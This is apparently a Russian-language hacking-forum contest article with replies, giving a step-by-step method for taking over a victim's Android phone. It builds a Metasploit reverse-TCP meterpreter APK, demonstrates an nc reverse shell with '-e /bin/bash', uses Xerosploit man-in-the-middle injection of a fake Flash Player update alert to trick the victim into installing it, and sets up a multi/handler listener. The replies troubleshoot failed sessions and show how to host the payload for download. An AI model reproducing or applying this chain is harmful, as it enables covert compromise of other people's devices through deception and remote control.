Конкурс Способ доставки payload на смартфон базированный на android.

Статья для участия в конкурсе на codeby.

Приветствую вас дорогие друзья.

Сегодня я бы хотел рассказать вам о простом способе взлома смартфона на базе android. В большей степени способ основан на социальной инженерии. Но все же нам придется провести малый ряд атак.

Словарик хакера.

Metasploit - коротко говоря платформа предназначенная для поиска и эксплоутации уязвимостей.
Payload — Полезная, или смысловая нагрузка. Это код, который выполняется после успешного выполнения атаки.

Exploit - это программа или фрагмент кода использующий уязвимость программного обеспечения(или же веб ресурса и операционной системы)
Для того что бы хоть как-то разобраться в эксплоитах представим себе такой самый простой пример:

Вы хотите получить привилегию root на вашем android устройстве. Так вот те программы которые вы используете для получения root - это и есть эксплоиты использующие уязвимость android.

Помимо таких эксплоитов есть те что намного страшней. Это эксплоиты 0day. Эти эксплоиты написаны на неизвестную или мало кому известную уязвимость и тем самым могут нанести больший вред.

Что же , сегодня мы создадим payload. Моим способом доставим его нашей "жертве" и получим сессию meterpreter.

Meterpreter - это пэйлоад который обеспечивает доступ к интерактивному шеллу.


Немного про социальную инженерию(СИ)

Помойму, сколько бы лет не прошло, но самым главным оружием хакера останется социальная инженерия(в том случае если мир не захватят роботы). Социальная инженерия основана на человеческом доверии(в частности). Про СИ написано множество книг.
Может какую-то систему и нельзя взломать, но она создана человеком. А человеческое доверие самая большая уязвимость.

Вобщем при помощи социальной инженерии мы можем управлять человеком.

В дополнение.

Мой способ состоит из 3-х небольших частей.

ч. 1 ---> создание пэйлоада.
ч. 2 ---> собственно СИ.
ч. 3 ---> получение meterpreter.

Теперь приступим к делу.

Часть 1. - Payload.

Что же для начала запустим metasploit.
Код:
msfconsole

Screenshot from 2017-10-31 16-15-26.png

Теперь давайте откроем новую вкладку в терминале(не у всех, но Shift+Ctrl+T)

Приступим к созданию пэйлоада. Для этого нам понадобится утилита msfvenom.
Эта утилита предназначена для тестирования на проникновение устройств на базе android.

Для начала узнаем наше "имя" в локальной сети.
Код:
ifconfig

Screenshot from 2017-10-31 16-14-59.png

Как видим у меня это 192.168.1.3
Теперь пишем следующее
Код:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=4444 R > tester.apk

LHOST - это как раз таки имя вашего хоста.

PORT - порт к которому в дальнейшем подключится "зараженное" android устройство.

Сейчас постараюсь обьяснить вам как же они работают.
У вас на машине открывается порт. Мы указывали 4444. Далее к этому порту конектится(подключается) android устройство которое мы наградили payload'ом. А теперь рассмотрим все на примере ncat.

Откройте 2-е вкладки в терминале. Допустим первая вкладка это машина хакера, а вторая - жертва. В первой вкладке пишем
Код:
nc -l -p 8543
Тем самым мы открыли на машине хакера порт 8543. Теперь во второй вкладке пишем следующее
Код:
nc 192.168.1.6 8543 -e /bin/bash
То есть жертва подключилась к открытому порту на хакерской машине 192.168.1.6 и дала доступ к командной оболочке.
Теперь в первой вкладке вы можете прописать какую-либо команду и вы выполните ее на "машине жертвы". На самом же деле настоящие пайлоады работают намного сложней. Но думаю суть вы уловили.

Так вот, теперь у нас имеется файл tester.apk - наш пэйлоад.
Теперь к интересному.

Часть 2.

В этой части мы будем использовать MITM фрэймворк для проведения атаки "человек по середине" - Xerosploit.

MITM (Man In The Middle - "Человек по середине") -- атака позволяющая хакеру прослушать трафик(подменить) в каком-то смысле претворившись роутером.

Давайте для начала установим xerosploit. Насколько мне известно , в основном он зависим от python, nmap, hping3,
build-essential, ruby-dev, libpcap-dev, libgmp3-dev, tabulate, terminaltables..

Так что перед его установкой установите эти пакеты.
Теперь пишем
Код:
1. git clone https://github.com/LionSec/xerosploit
2. cd xerosploit
3. python install.py

Теперь выберите свой дистрибутив. После установки неплохо бы разобраться в функционале.

Xerosploit весьма многофункционален и легок в использовании. Вот некоторые его возможности:

pscan - сканирование портов.
sniff - сниффинг.
injecthtml - иньекция html кода.
injectjs - иньекция javascript кода.
dspoof - передача трафика на другой локальный хост.
dos - denial of service атака.
И еще много другое.

Запускаем xerosploit
Код:
xerosploit

Screenshot from 2017-10-31 16-15-29.png

Теперь давайте просканируем нашу сеть.
Код:
> scan
А вот и мое андроид устройство.

Screenshot from 2017-10-31 16-16-46.png

Теперь выберем его. Для этого просто прописываем имя хоста.
П.С: для просмотра функционала просто пропишите help.

Мой способ палевный, но все же рабочий. Давайте зальем наш пэйлоад на какой-нибудь простеньки хостинг.

Теперь можете создать js файл с таким содержимым
Код:
<script>
alert("Приносим свои извинения, но ваша версия Flash Player устарела и вы не можете просмотреть материал данного ресурса. Обновленная версия находится тут:  http://site.test/flash.html");
</script>

Далее в новой вкладке снова запустим xerosploit. Сканируем сеть и выбираем нашу цель.
Теперь выберем такую функцию как injectjs > run > имя вашего js файла.

Часть 3.

Теперь осталось получить сессию meterpreter.
В изначально запущенном metasploit пишем следующие команды.
Код:
> use multi/handler
> set payload android/meterpreter/reverse_tcp
> set LHOST 192.168.1.3
> set LPORT 4444
> exploit

Screenshot from 2017-10-31 16-21-46-1.png

И после всех проведенных нами атак жертва по идее открывает наш tester.apk ( желательно переименовать в flash.apk) и мы получаем контроль над ее устройством.
Если я не ошибаюсь то можно вместо xerosploit использовать beef. Так появится еще больше шансов что скрипт выполнится нормально.
На этом все!
 
Последнее редактирование:

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
вариантов уйма..неправильная конфигурация полезной нагрузки. листенера,если с внешней сети отстук идет ,то возможно проброс портом не сделили...вы бы скрины сделали как полезную нагрузку готовили. и листенера..
 
W

Wisp29

вариантов уйма..неправильная конфигурация полезной нагрузки. листенера,если с внешней сети отстук идет ,то возможно проброс портом не сделили...вы бы скрины сделали как полезную нагрузку готовили. и листенера..
Снимок экрана от 2018-04-09 16-06-18.png Снимок экрана от 2018-04-09 16-08-55.png
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
с первого взгляда всё верно...попробуйте другим инструментом создать полезную нагрузку..здесь на форуме поднималась данная тематика
 
W

Wisp29

с первого взгляда всё верно...попробуйте другим инструментом создать полезную нагрузку..здесь на форуме поднималась данная тематика
буду пытаться, спасибо, а из-за этого не может быть? Снимок экрана от 2018-04-09 16-34-07.png это при запуске metasploit
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
нет . что бы у вас это не выскакивало перед запуском метасплойта введите
/etc/init.d/postgresql start
 
  • Нравится
Реакции: Wisp29

Tihon49

Green Team
06.01.2018
193
120
BIT
0
Ну на самом деле тема не раскрыта, как и писали выше. Кто не знает как залить нагрузку на хост, будут много и долго еб"%ся с тем что им выдаст гугл. А там будет и биф+бетеркеп и еще хрен пойми что. Дописал бы уж как это делал ты, поднимал апач сервер или еще как-то, в какую папку копировал файл с нагрузкой.... кто шарит, тому как бы все это не нужно ибо знакомо, а кто не шарит - это целый мир! (сам писать не буду :geek: )

ЗЫ. ладно, допишу =)
Может ТС имел ввиду совсем другой способ, но я напишу как я понял. Если не прав, попрошу админа удалить мой пост шоб людям мозги не путать.
по мне так самый простой вариант это запустить терминал из папки с нагрузкой и ввести команду:
Код:
python -m SimpleHTTPServer 8081
далее вводим в новом окне терминала комаду чтобы узнать наш IP:
Код:
ifconfig
к примеру у меня это 192.168.1.201

копируем наш IP, вставляем его в строку браузера, дописываем в адрес ":8081" (без ковычек).
таким образом наша ссылка будет иметь вид:
Код:
192.168.1.201:8081
тут вижу мой пэйлоад, допустим он называется http.apk
Тогда ссылка для жертвы будет выглядеть следующим образом:
Код:
192.168.1.201:8081/http.apk
Ну вот и все! Ссылка с файлом для скачивания готова.
 
Последнее редактирование:
  • Нравится
Реакции: Valkiria и id2746

Bladjak

New member
28.03.2023
4
0
BIT
0
с первого взгляда всё верно...попробуйте другим инструментом создать полезную нагрузку..здесь на форуме поднималась данная тематика
А тема какая где об этой проблеме говорилось ?
А то у меня тоже такая я же проблема
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!